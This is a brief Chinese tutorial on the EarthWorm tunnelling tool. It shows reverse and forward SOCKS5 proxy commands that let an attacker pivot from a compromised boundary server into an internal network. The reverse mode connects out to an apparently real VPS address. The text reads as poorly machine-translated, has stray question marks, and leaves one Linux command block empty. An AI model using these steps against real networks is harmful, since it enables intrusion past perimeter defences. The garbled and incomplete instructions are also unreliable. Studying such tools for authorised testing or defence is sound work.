EarthWorm
目标出网(反向代理)
目标不出网(正代理)
EarthWorm
EarthWorm(ew)便携式网络穿透工具 SOCKS v5服务架设和端口转发两个核心功能,可以通过正、反、多层次联系等方式开辟网络隧道,直接进入网络深处,在复杂的网络环境中完成网络渗透。工具包工具包中的各种可执行文件Linux、Windows、MacOS、Arm-Linux等待不同的操作系统。
项目地址:GitHub - idlefire/ew: 内网穿透(跨平台)
目标出网(反向代理)
反向代理是我们服务端的监控,标准客户端连接我们的服务端,称为反向代理。
服务端vps打开监控7500端口,等待客户连接7500端口
#linux中
./ew_for_linux64 -s rssocks -l 7777 -e 7500

获胜的网络边界服务器是客户端,主动连接7500端口
#windows中
ew_for_Win.exe -s rssocks -d 39.100.88.162 -e 7500
#linux中
./ew_for_linux64 -s rssocks -d 39.100.88.162 -e 7500
这样隧道就搭建成功了,然后我们本地使用Proxifier连接7777端口,建立socks5隧道
这样就可以直接进入内网了。
目标不出网(正代理)
正代理是客户端监控,攻击者主动连接客户端,称为正代理。因为攻击者主动连接目标,所以不需要额外的vps。由于反向代理是主动连接我们的目标,我们不能直接连接内网,所以我们需要vps。
?第一标客户端执行:
#windows
ew_for_Win.exe -s ssocksd -l 80
#linux
````
监听80端口
然后使? Proxifier ?直接与标准客户端建立socks5隧道
访问内网web服务